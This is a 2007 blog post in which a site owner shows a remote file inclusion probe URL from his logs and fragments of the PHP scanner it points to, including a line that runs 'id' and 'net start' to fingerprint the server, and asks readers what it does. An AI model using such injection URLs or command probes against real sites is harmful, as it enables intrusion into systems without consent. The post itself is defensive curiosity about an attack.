Is this a hacker’s tool?

Over the last few days, I have had lots of site hits looking for rather strange URLs on this blog such as:

http://www.theopensourcerer.com/2007/10/25/upcoming-free-seminar//site.php?page= http://www.erdc.cyc.edu.tw/4images/cache/rfi/test.txt???

I took a look at the file the url refers to. Here it is:

/\/\/\ Response CMD /\/\/\

`Changing this CMD will result in corrupt scanning !`






Can someone who understands PHP tell me what this is trying to do? It is clearly a scanning/hacking tool designed to retrieve data - I guess to help with further exploits. But I can't quite work it out, especially the

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){

echo("Safe Mode of this Server is : "); line.
It's a php script so why should it care if the site is on Windows or Linux? Any takers...
Share:
Email
LinkedIn
Twitter
Facebook
            	
            	    December 20th, 2007 | Alan Lord | Tags: Hacker, Microsoft.
            	    Categories: FLOSS in the news | Comments: 3 Comments



    Libertus Solutions
			
		
Subscribe to Blog via Email
			
			
									Enter your email address to subscribe to this blog and receive notifications of new posts by email.

										
						
							Email Address						
						
					

					
						
						
						
						
												
					
							
						
			
Tag Cloud
#ukgovOSS
Alfresco
Asterisk
Asus
Baiting
Becta
Canonical
Chilli
CRM
Education
EU
Firefox
Free Software
Gimp
Glyn Moody
Google
Government
GPL
ISO
Joomla!
Licenses
Linux
low power server
Microsoft
Mono
Mozilla
Novell
ODF
OOXML
OpenERP
OpenOffice.org
Open Source
Open Standards
Patents
Samba
Schools
The Open Learning Centre
Thunderbird
Ubuntu
UK
Untangle
Vista
vtiger
Windows
Wordpress
Blogroll
	
Andy Updegrove
Bob Sutor
Confused of Calcutta
Groklaw
Launchpad Blog
Naked Computers
Open Source Schools
OPEN…
Planet Ubuntu
Planet Ubuntu UK
Planet Ubuntu Users
Rob Weir
The Linux Blog
The Way Out
The webbook blog

	

Recent Comments
Stephane on How to Install OpenERP Odoo 8 on Ubuntu Server 14.04 LTS
Anson on How to Install OpenERP Odoo 8 on Ubuntu Server 14.04 LTS
Aaron Gong on How to Install OpenERP Odoo 8 on Ubuntu Server 14.04 LTS
mohamed on How to Install OpenERP Odoo 8 on Ubuntu Server 14.04 LTS
Alan Lord on GeoTools re-visited
License
			



The content of this website is licensed under a 
Creative Commons Attribution-Share Alike 3.0 License.
		
Feeds and Services
		
						Log in
			Entries feed
			Comments feed

			WordPress.org
		

		


    
    	
    	    Site Contents: ©2007 The Open Sourcerer

    	    Wordpress Theme: ©The Open Learning Centre
    	
    	
            
                
            
            
                
            
        
        
            Fri Apr 26th 16:20:08 UTC 2024